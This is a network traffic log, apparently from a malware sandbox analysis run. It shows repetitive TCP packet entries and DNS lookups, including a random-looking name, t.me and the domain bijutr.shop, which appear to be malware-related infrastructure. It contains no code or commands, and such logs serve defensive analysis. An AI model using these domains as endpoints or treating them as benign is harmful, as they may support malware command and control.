                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.176723957 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.177148104 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.177208900 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.177222013 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.177321911 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.177369118 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.177381992 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.177392960 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.177405119 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.177416086 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.209795952 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.414715052 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.524923086 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.740600109 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.743578911 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.743952036 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744250059 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744405031 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744436026 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744458914 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744499922 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744524002 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744549036 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744663000 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744729996 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744740963 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744752884 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744764090 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744785070 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744954109 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744966030 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.744976044 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.745403051 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:52.763955116 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:53.227401018 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:53.227415085 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:53.229074955 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:05.633518934 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:05.633635998 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:05.633671045 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:05.633814096 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:05.641535044 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:05.965058088 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:05.972978115 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:05.973011971 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:05.973067045 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:05.973608017 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:05.990613937 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:06.316464901 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:06.321382046 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:06.321506023 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:06.321535110 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:06.321872950 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:06.330800056 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:06.660672903 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:06.666255951 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:06.666351080 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:06.666584015 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:06.666610003 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:06.675466061 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:06.998927116 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.006479025 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.006529093 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.006565094 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.006853104 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.014632940 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.338179111 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.344448090 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.344501972 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.344602108 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.344904900 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.353185892 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.676750898 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.682615042 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.682626009 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.682698965 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.682974100 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:07.690587997 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.014161110 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.019742012 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.019781113 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.019867897 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.020227909 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.027838945 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.351362944 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.356812000 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.356846094 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.356858015 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.357206106 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.366815090 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.692217112 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.700294018 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.700345993 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.700490952 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.700555086 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:08.706748962 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.051736116 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.056483030 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.056495905 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.056557894 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.056828022 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.063575029 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.399216890 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.406128883 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.406141996 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.406151056 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.406529903 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.413311958 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.736743927 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.742235899 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.742257118 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.742345095 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.742610931 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:09.748239040 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:10.074814081 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:10.082665920 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:10.082678080 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:10.082781076 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.179410934 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.187175989 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.510601044 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.515480042 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.515624046 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.515665054 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.515714884 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.521572113 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.844784021 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.851592064 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.851603985 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.851629972 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.851975918 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.858074903 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.186516047 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.203352928 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.203381062 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.203444004 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.203706980 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.210839987 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.534204006 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.542617083 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.542700052 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.542802095 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.543006897 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.550306082 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.873549938 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.878818989 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.878855944 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.878923893 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.879118919 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.888448954 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.212985992 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.218914986 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.218924999 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.219005108 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.219234943 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.224770069 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.548049927 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.553765059 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.553828955 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.553873062 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.554064989 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.559665918 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.960587025 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.960599899 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.960608959 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.960618019 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.960966110 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.966248035 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.289829016 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.296989918 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.297094107 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.297214031 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.297290087 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.303373098 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.626974106 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.634036064 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.634051085 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.634099007 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.634331942 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.639894962 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.964087963 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.970058918 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.970086098 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.970144987 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.970374107 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.976219893 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.318511963 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.319298029 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.319320917 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.319346905 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.356275082 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.423269987 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.511080980 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.703391075 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.834952116 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.839941978 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.839953899 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.840079069 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.840224981 CET53071443192.168.2.723.209.72.21
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 27, 2024 07:10:28.708302021 CET | 192.168.2.7 | 1.1.1.1 | c24d | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 07:09:16.550190926 CET | 192.168.2.7 | 1.1.1.1 | 0x9c19 | Standard query (0) | jCkYzqqYDalcEKzOzlTGtPWyRfbt.jCkYzqqYDalcEKzOzlTGtPWyRfbt | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:09:50.894941092 CET | 192.168.2.7 | 1.1.1.1 | 0x33e2 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:09:53.024977922 CET | 192.168.2.7 | 1.1.1.1 | 0x8363 | Standard query (0) | bijutr.shop | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:09.595563889 CET | 192.168.2.7 | 1.1.1.1 | 0xe7c6 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:09.596015930 CET | 192.168.2.7 | 1.1.1.1 | 0xd1f | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Dec 27, 2024 07:10:24.529279947 CET | 192.168.2.7 | 1.1.1.1 | 0xc6d0 | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:24.529447079 CET | 192.168.2.7 | 1.1.1.1 | 0xc7d7 | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false
Dec 27, 2024 07:10:28.028914928 CET | 192.168.2.7 | 1.1.1.1 | 0xe6b2 | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:28.029139042 CET | 192.168.2.7 | 1.1.1.1 | 0xf4 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false
Dec 27, 2024 07:10:28.331904888 CET | 192.168.2.7 | 1.1.1.1 | 0x5749 | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:28.332251072 CET | 192.168.2.7 | 1.1.1.1 | 0x1529 | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false
Dec 27, 2024 07:10:28.924911022 CET | 192.168.2.7 | 1.1.1.1 | 0xf5ac | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:28.927558899 CET | 192.168.2.7 | 1.1.1.1 | 0xc983 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 27, 2024 07:10:28.927942038 CET | 192.168.2.7 | 1.1.1.1 | 0x5aa3 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:29.023705959 CET | 192.168.2.7 | 1.1.1.1 | 0x513b | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 27, 2024 07:10:29.059061050 CET | 192.168.2.7 | 1.1.1.1 | 0xa800 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:29.059246063 CET | 192.168.2.7 | 1.1.1.1 | 0xda51 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 27, 2024 07:10:32.679513931 CET | 192.168.2.7 | 1.1.1.1 | 0x461e | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:32.679994106 CET | 192.168.2.7 | 1.1.1.1 | 0x47f7 | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false
Dec 27, 2024 07:10:32.686352968 CET | 192.168.2.7 | 1.1.1.1 | 0xccdf | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:32.686678886 CET | 192.168.2.7 | 1.1.1.1 | 0x8dbc | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 07:09:16.785346985 CET | 1.1.1.1 | 192.168.2.7 | 0x9c19 | Name error (3) | jCkYzqqYDalcEKzOzlTGtPWyRfbt.jCkYzqqYDalcEKzOzlTGtPWyRfbt | none | none | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:09:51.031877995 CET | 1.1.1.1 | 192.168.2.7 | 0x33e2 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:09:53.164978981 CET | 1.1.1.1 | 192.168.2.7 | 0x8363 | No error (0) | bijutr.shop | | 188.245.216.205 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:09.732707977 CET | 1.1.1.1 | 192.168.2.7 | 0xe7c6 | No error (0) | www.google.com | | 172.217.21.36 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:09.732851028 CET | 1.1.1.1 | 192.168.2.7 | 0xd1f | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Dec 27, 2024 07:10:24.666220903 CET | 1.1.1.1 | 192.168.2.7 | 0xc6d0 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 07:10:24.667823076 CET | 1.1.1.1 | 192.168.2.7 | 0xc7d7 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 07:10:25.008536100 CET | 1.1.1.1 | 192.168.2.7 | 0x8f03 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 07:10:25.008536100 CET | 1.1.1.1 | 192.168.2.7 | 0x8f03 | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | 94.245.104.56 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:25.023725033 CET | 1.1.1.1 | 192.168.2.7 | 0x977a | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 07:10:28.167045116 CET | 1.1.1.1 | 192.168.2.7 | 0xf4 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 07:10:28.279422998 CET | 1.1.1.1 | 192.168.2.7 | 0xe6b2 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 07:10:28.469239950 CET | 1.1.1.1 | 192.168.2.7 | 0x5749 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
